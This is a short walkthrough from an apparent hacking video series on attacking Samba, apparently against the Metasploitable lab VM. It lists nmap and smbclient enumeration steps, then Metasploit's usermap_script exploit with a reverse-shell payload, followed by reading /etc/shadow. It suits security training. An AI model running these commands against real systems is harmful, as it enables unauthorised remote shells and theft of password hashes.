#HackOnTuesday Episode 5 Attacking Samba with Metasploit

Every week we try to share techniques and tools to attack the most common services used by companies all around the World, such as Apache, MySQL, PostgreSQL, etc. In this episode, Gianni turns his attention to Samba. After a short introduction to learn how to find all the computers that have open shares, he moves on and shows how to get the Netbios name of an host, get the list of shares available on the host, download files from a share, and exploit vulnerable Samba instances.

Tools, Scripts, and Exploits


» Identify all the computers that have open shares
   • nmap -v -sV -p 139
» Get the Netbios name of the target machine
   • nmblookup -A
» Get the list of shares available on the target machine
   • smbclient -L \\METASPLOITABLE -I -N
» Inspect the tmp share
   • smbclient //METASPLOITABLE/tmp -I -N
   • dir
   • cd .ICE-unix
   • dir
   • cd ..
   • cd .X11-unix
   • dir
   • exit
» Use the Metasploit’s usermap_script module to get code execution
   • msfconsole
   • use exploit/multi/samba/usermap_script
   • show options
   • set RHOST
   • show payloads
   • set PAYLOAD cmd/unix/reverse
   • show options
   • /sbin/ifconfig
   • set LHOST
   • exploit
» Get root
   • whoami
   • cat /etc/shadow
» Game over!